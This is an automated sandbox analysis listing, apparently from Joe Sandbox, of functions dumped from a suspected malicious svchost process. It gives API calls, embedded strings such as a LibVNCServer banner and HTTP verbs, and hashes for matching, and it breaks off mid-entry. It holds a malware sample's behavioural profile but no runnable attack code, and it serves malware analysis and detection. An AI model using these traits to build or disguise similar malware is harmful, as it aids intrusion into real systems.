Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$AttributesClassInfoLayeredLongName
String ID: <
API String ID: 195909263-4251816714
Opcode ID: f5809745f68334f7453456e7bffed2d4dd8a00f152cdfbf7b77567c2f22014c5
Instruction ID: ea6988e767385ba96f5e0453924cff3f122e655f23fcf7ee747a34a9dd88e643
Opcode Fuzzy Hash: f5809745f68334f7453456e7bffed2d4dd8a00f152cdfbf7b77567c2f22014c5
Instruction Fuzzy Hash: 6BF0F430AA41256FD774EAA4E80AF7E376CDF11B48F214529F801E5780EF50DC68CA75

Function 02D22ED8 Relevance: 6.5, APIs: 5, Instructions: 228COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,00000000,?,?,00000000,00000000), ref: 02D230EF
free.MSVCRT(00000000), ref: 02D23113
free.MSVCRT(?), ref: 02D23134

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9c7e84001997cd86040c08e18f8eaeac6d80fdff2aafe23fe7da32cb90d721a5
Instruction ID: ddf93a4f2106be92d7f63918a92526de1e2da83ed77dede21bcab52b4178c40f
Opcode Fuzzy Hash: 9c7e84001997cd86040c08e18f8eaeac6d80fdff2aafe23fe7da32cb90d721a5
Instruction Fuzzy Hash: 7B816C71A0022A9BDF20CF49C584BAEB7B1FFA8318F240598ED05A7380D735DD59CBA1

Function 02D54A60 Relevance: 6.2, APIs: 4, Instructions: 248COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D54AB9
realloc.MSVCRT ref: 02D54AC5
malloc.MSVCRT ref: 02D54AEB
realloc.MSVCRT ref: 02D54AF7

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: mallocrealloc
String ID:
API String ID: 948496778-0
Opcode ID: 2acd95ac0e0b4233c71f39beb4a1201124dfc8a34ae8bb4fa353d1920394f446
Instruction ID: fb62f2293aea8f87324b184c569d7d5dd30bdfe3289d34d56fb1c2d828ea1eb3
Opcode Fuzzy Hash: 2acd95ac0e0b4233c71f39beb4a1201124dfc8a34ae8bb4fa353d1920394f446
Instruction Fuzzy Hash: 2891D376E006699FCF04CF24D880AAA3BA6EF84311F0445B9ED099B345D7B4AD55CBB1

Function 02D4B150 Relevance: 6.2, APIs: 4, Instructions: 248COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D4B1A9
realloc.MSVCRT ref: 02D4B1B5
malloc.MSVCRT ref: 02D4B1DB
realloc.MSVCRT ref: 02D4B1E7

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: mallocrealloc
String ID:
API String ID: 948496778-0
Opcode ID: 5fc92da5d976f43fc23f81190bcb7e4d8941991fbcf3f4e4cbc7279d7a710ff5
Instruction ID: f4c95fa328d54f244abe4f9c668408f33f581591096055782e201b2b57813e31
Opcode Fuzzy Hash: 5fc92da5d976f43fc23f81190bcb7e4d8941991fbcf3f4e4cbc7279d7a710ff5
Instruction Fuzzy Hash: 8791D476E002598FDB04DF24D884AAA3BA6EF54309F0485BAED0D9B345DB74ED15CBB0

Function 02D501D0 Relevance: 6.1, APIs: 4, Instructions: 146COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 02D501FB
closesocket.WS2_32(?), ref: 02D50260
closesocket.WS2_32(?), ref: 02D502D0
closesocket.WS2_32(?), ref: 02D50340

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: b1c4b8a6ad51eaf126fbccc65fbd89ba7aa0fd8e7d3e7acaa3ef6759a35f840f
Instruction ID: 1b447e26bcd8d57cc8a8936fc448c6420aba5d0e2772d2c04d328280b5418d3b
Opcode Fuzzy Hash: b1c4b8a6ad51eaf126fbccc65fbd89ba7aa0fd8e7d3e7acaa3ef6759a35f840f
Instruction Fuzzy Hash: 9951F970100B119BDB25CF24C4946E6B3E6FB99329F74CA19C8BB87354EB71E946CB50

Function 02D4D330 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D4D362

Strings

unknown, xrefs: 02D4D34B, 02D4D355
LibVNCServer 0.9.7, xrefs: 02D4D350
%s (%s), xrefs: 02D4D35C

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s (%s)$LibVNCServer 0.9.7$unknown
API String ID: 2111968516-696653274
Opcode ID: 074e29d3229b2c864c3feee7dbb909c66dedd3421ef52d251c84c2532f0aaa15
Instruction ID: ed58fcff45ed86856fcb2d3eeef7d69eb9d38605bcf84d72afe50b026e3ddc0b
Opcode Fuzzy Hash: 074e29d3229b2c864c3feee7dbb909c66dedd3421ef52d251c84c2532f0aaa15
Instruction Fuzzy Hash: 4D41A731A0425A8FDB05DF28C9A8BE677A6EF45305F0481F5DD4D9F306DB74A90ACBA0

Function 02D27AB9 Relevance: 6.1, APIs: 4, Instructions: 78memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,74DEF380), ref: 02D27B2D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,74DEF380), ref: 02D27B34
memset.MSVCRT ref: 02D27B43
RegCloseKey.ADVAPI32(?,?,?,?,?,74DEF380), ref: 02D27B73

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseProcessmemset
String ID:
API String ID: 2501364573-0
Opcode ID: e752db339a10adafc5bdbad11974da013f4c261ed8ae0d1a9a38d9836c502ebc
Instruction ID: d1a4a98163ee9f37bb26840b024d8437f7715757fe5cda33fecb9cda690a7f50
Opcode Fuzzy Hash: e752db339a10adafc5bdbad11974da013f4c261ed8ae0d1a9a38d9836c502ebc
Instruction Fuzzy Hash: 3E213E329040795FEB359A74DC9CBEAF79AEB69308F1409B8D685C7340D2308D88C7A0

Function 02D32060 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D32082
GetParent.USER32(?), ref: 02D3208E
GetWindowTextW.USER32(00000000,?,00000104), ref: 02D320A5
StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02D320C6

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ParentTextWindowmemset
String ID:
API String ID: 4175915554-0
Opcode ID: c9d3c0003f22ba11de256463a12fd0bffc1938ee76e19661b512cc7136d6af20
Instruction ID: 1523af6291c17d11a763843a0b36d725b5e0f1c175bbe250820e2fdc9eb8a60c
Opcode Fuzzy Hash: c9d3c0003f22ba11de256463a12fd0bffc1938ee76e19661b512cc7136d6af20
Instruction Fuzzy Hash: 0D01C073F4021427D7209A69ECCCEABF36DAB44654F54427AFE18E3300EA70DD98C6A0

Function 02D389E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,?,?,00000000,?,?,02D38FB5,?), ref: 02D389F3

Part of subcall function 02D33D20: GetProcessHeap.KERNEL32(00000008,?,?,?,02D38A05,?,?,02D38FB5,?), ref: 02D33D31
Part of subcall function 02D33D20: HeapAlloc.KERNEL32(00000000,?,?,02D38FB5,?), ref: 02D33D38
Part of subcall function 02D33D20: memset.MSVCRT ref: 02D33D48

memcpy.MSVCRT ref: 02D38A0E

Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26DA1
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26DB4
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26DC7
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26DDA
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26DED
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E00
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E13
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E26
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E39
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E4C
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E5F
Part of subcall function 02D26D40: isdigit.MSVCRT ref: 02D26E72

Part of subcall function 02D3DCA0: memset.MSVCRT ref: 02D3DCC1
Part of subcall function 02D3DCA0: StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02D3DCF9
Part of subcall function 02D3DCA0: PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3DD2D
Part of subcall function 02D3DCA0: PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3DD63
Part of subcall function 02D3DCA0: PathFileExistsA.SHLWAPI(00000000), ref: 02D3DDA9

Part of subcall function 02D440E0: strstr.MSVCRT ref: 02D44123
Part of subcall function 02D440E0: strstr.MSVCRT ref: 02D44136
Part of subcall function 02D440E0: strstr.MSVCRT ref: 02D44149
Part of subcall function 02D440E0: PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D44177
Part of subcall function 02D440E0: PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D441AD
Part of subcall function 02D440E0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02D4420D

Strings

POST, xrefs: 02D38A38
GET , xrefs: 02D38A31

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: isdigit$Path$Backslash$strstr$Heapmemset$AllocCreateDirectoryExistsFileProcessReadmemcpy
String ID: GET $POST
API String ID: 1864109261-2494278042
Opcode ID: 242d1049064edd71d367baa0f87c59b214237d2d7f5640c1ccd1d70561da99bd
Instruction ID: d66d5c05b940130eda62f7255854e8738408e2e66b3a1b0369293df8a89d7aec
Opcode Fuzzy Hash: 242d1049064edd71d367baa0f87c59b214237d2d7f5640c1ccd1d70561da99bd
Instruction Fuzzy Hash: 99F028315096542BD7337651EC84FAF6B9ECD42744B044429F505D2300DB34EC81EAF5

Function 02D2CB10 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02D2C8C0: IsWindowVisible.USER32(02D2D04D), ref: 02D2C8DF
Part of subcall function 02D2C8C0: GetWindowInfo.USER32(02D2D04D,?), ref: 02D2C8F9
Part of subcall function 02D2C8C0: GetClassLongA.USER32(02D2D04D,000000E6), ref: 02D2C94E
Part of subcall function 02D2C8C0: PrintWindow.USER32(02D2D04D,?,00000000), ref: 02D2C967

memset.MSVCRT ref: 02D2CB41

Part of subcall function 02D2CA20: GetWindowRect.USER32(02D2CB54,00000000), ref: 02D2CA2F
Part of subcall function 02D2CA20: GetWindowLongA.USER32(02D2CB54,000000F0), ref: 02D2CA49
Part of subcall function 02D2CA20: GetScrollBarInfo.USER32(02D2CB54,000000FA,?), ref: 02D2CA64
Part of subcall function 02D2CA20: GetScrollBarInfo.USER32(02D2CB54,000000FB,0000003C), ref: 02D2CA91

GetWindow.USER32(02D2D04D,00000005), ref: 02D2CB5C
GetWindow.USER32(00000000), ref: 02D2CB5F

Part of subcall function 02D2CB10: GetWindow.USER32(02D2D04D,00000003), ref: 02D2CB6A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Info$LongScroll$ClassPrintRectVisiblememset
String ID:
API String ID: 406580094-0
Opcode ID: 62ae9d1d941572270a632eabca72b1c73baf0ac07d2b4fa8853c9098be409e9f
Instruction ID: febc2b0cee0e0ff1e1e459bf186ec0544517991a08deecc1bc9e49eb45dab957
Opcode Fuzzy Hash: 62ae9d1d941572270a632eabca72b1c73baf0ac07d2b4fa8853c9098be409e9f
Instruction Fuzzy Hash: 48F0C872B5021437DA11B668AC85FAFB76DDB94B54F010016F904A7380DAA0AD054AF5

Function 02D273A0 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,75B05CE0,?,?,02D3DDE9,00000000), ref: 02D273B8
LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,02D3DDE9,00000000), ref: 02D273C7
WriteFile.KERNEL32(00000000,?,00000001,?,00000000,?,?,02D3DDE9,00000000), ref: 02D273D9
UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,02D3DDE9,00000000), ref: 02D273E9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$LockPointerUnlockWrite
String ID:
API String ID: 3342219707-0
Opcode ID: b30398be20e4f7ce5fcb444b9fbc83fc08bc3cacbed86e5670fc512190d2195d
Instruction ID: 76acc850955b5bc148d3e1d93b74ff60fd75ff80802ed2b3475a72a0be524aa5
Opcode Fuzzy Hash: b30398be20e4f7ce5fcb444b9fbc83fc08bc3cacbed86e5670fc512190d2195d
Instruction Fuzzy Hash: 90F036B1691218BFE7208F60DC4DFAF7BACEB49785F508415FA04D6280D6745E50C7B5

Function 02D23E50 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,02D240EB,?), ref: 02D23E5C
HeapAlloc.KERNEL32(00000000,?,02D240EB,?), ref: 02D23E63
_snprintf.MSVCRT ref: 02D23EA2

Strings

%d.%d.%d.%d, xrefs: 02D23E9A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess_snprintf
String ID: %d.%d.%d.%d
API String ID: 1060465051-3491811756
Opcode ID: ebf736ea9721020117d590ce116b2c10f642c6ba8c0eb470a1acb76ddd7610f4
Instruction ID: 8655c3f484cc481ca9cda9f19aae74b0af1cef1f7a693490d59bf8e733a44b96
Opcode Fuzzy Hash: ebf736ea9721020117d590ce116b2c10f642c6ba8c0eb470a1acb76ddd7610f4
Instruction Fuzzy Hash: DDF081B1940720AFC3708F69A808B67BBF8EF0C611B40892EF589C6341D23496448BB0

Function 02D3A240 Relevance: 6.0, APIs: 4, Instructions: 37synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,75B07390,?,?,02D36AFD), ref: 02D3A25A
CreateThread.KERNEL32(00000000,00000000,02D3A2B0,00000000,00000000,00000000), ref: 02D3A274
GetHandleInformation.KERNEL32(00000000,?,?,?,02D36AFD), ref: 02D3A28C
CloseHandle.KERNEL32(00000000,?,?,02D36AFD), ref: 02D3A29D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CreateHandle$CloseInformationMutexThread
String ID:
API String ID: 3835061634-0
Opcode ID: c81ac57ad2ed72614d9e20f6ad0d12f30547fc638083439b9be529992a3ad04f
Instruction ID: 7643174e96dee9f03ec9a33873cf194aa181f8b4281df076be7d15d1c3a541de
Opcode Fuzzy Hash: c81ac57ad2ed72614d9e20f6ad0d12f30547fc638083439b9be529992a3ad04f
Instruction Fuzzy Hash: EAF06D35E85314BFE7618B60FC0EF5A3BA8AB04B11F644445FD01AB3C0DBB1AD108BA4

Function 02D3EA20 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000,?,?,02D3882E,00000000,02D30943,?,?,?,?,?,?), ref: 02D3EA30
CreateThread.KERNEL32(00000000,00000000,02D3E8D0,00000000,00000000,00000000), ref: 02D3EA45
GetHandleInformation.KERNEL32(00000000,02D30943,00000000,?,?,02D3882E,00000000), ref: 02D3EA63
CloseHandle.KERNEL32(00000000,?,?,02D3882E,00000000), ref: 02D3EA74

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateInformationTerminate
String ID:
API String ID: 1825730051-0
Opcode ID: 3b718a1b46dace82f88dfe691c008467709fd4f4b79aaaf2eaf1444e30e27db6
Instruction ID: ed6868bac8ccf3018d173d100eaf5496ebee446249ae051952a2ce955615a13e
Opcode Fuzzy Hash: 3b718a1b46dace82f88dfe691c008467709fd4f4b79aaaf2eaf1444e30e27db6
Instruction Fuzzy Hash: 92F0B470A88314BBE721CBA4EC0EB5A379CAF04B45F204554F909E23C0EBB49D14C6A4

Function 02D3B390 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000,?,?,02D3868E,00000000,02D30943,?,?,?,?,?,?), ref: 02D3B3A0
CreateThread.KERNEL32(00000000,00000000,02D3B240,00000000,00000000,00000000), ref: 02D3B3B5
GetHandleInformation.KERNEL32(00000000,02D30943,00000000,?,?,02D3868E,00000000), ref: 02D3B3D3
CloseHandle.KERNEL32(00000000,?,?,02D3868E,00000000), ref: 02D3B3E4

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateInformationTerminate
String ID:
API String ID: 1825730051-0
Opcode ID: ba354c66b3bf215a2b16334d2fde2f96fc5885748926e7c892ca928c614b8bb6
Instruction ID: 8652f59445391656a39f1c6f1b97cdb72ac61e3d6777f29a21aadb85642f4091
Opcode Fuzzy Hash: ba354c66b3bf215a2b16334d2fde2f96fc5885748926e7c892ca928c614b8bb6
Instruction Fuzzy Hash: 33F0B471A84314BBE7219B65EC0EF5A379CAB04749F244546F905E23C0EBB0ED14C674

Function 02D3F930 Relevance: 6.0, APIs: 4, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000,?,?,02D388DE,00000000,02D30943,?,?,?,?,?,?), ref: 02D3F940
CreateThread.KERNEL32(00000000,00000000,02D3F7E0,00000000,00000000,00000000), ref: 02D3F955
GetHandleInformation.KERNEL32(00000000,02D30943,00000000,?,?,02D388DE,00000000), ref: 02D3F973
CloseHandle.KERNEL32(00000000,?,?,02D388DE,00000000), ref: 02D3F984

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleThread$CloseCreateInformationTerminate
String ID:
API String ID: 1825730051-0
Opcode ID: 361ebc7f032d582e5fe2c41d10c59a579bd89da3f05c42faf0cae1a82ade4e87
Instruction ID: fcea2d2b1a9eb28b83bc0c3c5c29b79b04593f7ae02ac97709efbd3ec3dcd7d7
Opcode Fuzzy Hash: 361ebc7f032d582e5fe2c41d10c59a579bd89da3f05c42faf0cae1a82ade4e87
Instruction Fuzzy Hash: 2CF05470E84308BFE7218B65EC0EB5E779CAB18755F644954F909E23C0EBB49D14C674

Function 02D3F350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

public, xrefs: 02D3F452
private, xrefs: 02D3F3B0

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: private$public
API String ID: 0-4176808989
Opcode ID: f6908cfcfda4f973b81cef9494c862ddc13027cfd4aa773ca5ce10f620f7912b
Instruction ID: a18bbe05b8d4cbc64440a3acde0be896861a36f32be6d03af874f209e7fd2653
Opcode Fuzzy Hash: f6908cfcfda4f973b81cef9494c862ddc13027cfd4aa773ca5ce10f620f7912b
Instruction Fuzzy Hash: A7412732A0410D4FCB328B6CD8557BB73A2FB85228B5886A5D886CBB64F7759D45C780

Function 02D23EC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02D23EC2
_snprintf.MSVCRT ref: 02D23F26

Strings

%dd %dh %dm, xrefs: 02D23F17

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CountTick_snprintf
String ID: %dd %dh %dm
API String ID: 3495410349-3074259717
Opcode ID: d5434d4c7a9cab1f78b923c9489aa32adcb0d638ddbcab3419d0a0b0b0a475cb
Instruction ID: 37e920fe81f9100e27cda343d47805d50ed307b2eda8b58cb7185bb8b02329a9
Opcode Fuzzy Hash: d5434d4c7a9cab1f78b923c9489aa32adcb0d638ddbcab3419d0a0b0b0a475cb
Instruction Fuzzy Hash: C3F0E232B8101117A31C582DBD0AABA5A4B8BD832138CC63DFD0ADF3D8DCB89C5141D0

Function 02D3E600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON

Download Yara Rule

APIs

Part of subcall function 02D3E1B0: memset.MSVCRT ref: 02D3E1CF
Part of subcall function 02D3E1B0: memset.MSVCRT ref: 02D3E1F1
Part of subcall function 02D3E1B0: GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D3E206
Part of subcall function 02D3E1B0: SetErrorMode.KERNEL32(00000001), ref: 02D3E21F
Part of subcall function 02D3E1B0: GetDriveTypeA.KERNEL32(?), ref: 02D3E268
Part of subcall function 02D3E1B0: SetCurrentDirectoryA.KERNEL32(?), ref: 02D3E27B
Part of subcall function 02D3E1B0: FindFirstFileA.KERNEL32(?,?), ref: 02D3E2DD
Part of subcall function 02D3E1B0: SetErrorMode.KERNEL32(?), ref: 02D3E5F3

PathAddBackslashA.SHLWAPI(5E8DC03F), ref: 02D3E60B

Part of subcall function 02D33590: EnterCriticalSection.KERNEL32(02D6FB68,?,5E8DC08D,75B0A250), ref: 02D335A9
Part of subcall function 02D33590: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02D335BB
Part of subcall function 02D33590: _snprintf.MSVCRT ref: 02D335DB
Part of subcall function 02D33590: SetCurrentDirectoryA.KERNEL32(?), ref: 02D335EB
Part of subcall function 02D33590: PathAddBackslashA.SHLWAPI(?), ref: 02D336C0

Strings

COLV, xrefs: 02D3E611
5E8DC03F, xrefs: 02D3E606, 02D3E616

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
String ID: 5E8DC03F$COLV
API String ID: 2461973751-2191568894
Opcode ID: 48b9da4081db8ea976d7896b9e328021849f59c531943303bdd1b4bbc0dade64
Instruction ID: 9edb028271113eaa8e29b612928c06effe82fa10704e6f7bd9618616eaf0f1d8
Opcode Fuzzy Hash: 48b9da4081db8ea976d7896b9e328021849f59c531943303bdd1b4bbc0dade64
Instruction Fuzzy Hash: 56B09B729D0301A9F00537B4B90E91517214944D06710095571437434499D97C544776

Function 02D2E250 Relevance: 5.1, APIs: 4, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?,02D2FCDD,00000000), ref: 02D2E2A3
HeapValidate.KERNEL32(00000000,?,00000000,?,?,02D2FCDD,00000000), ref: 02D2E2A6
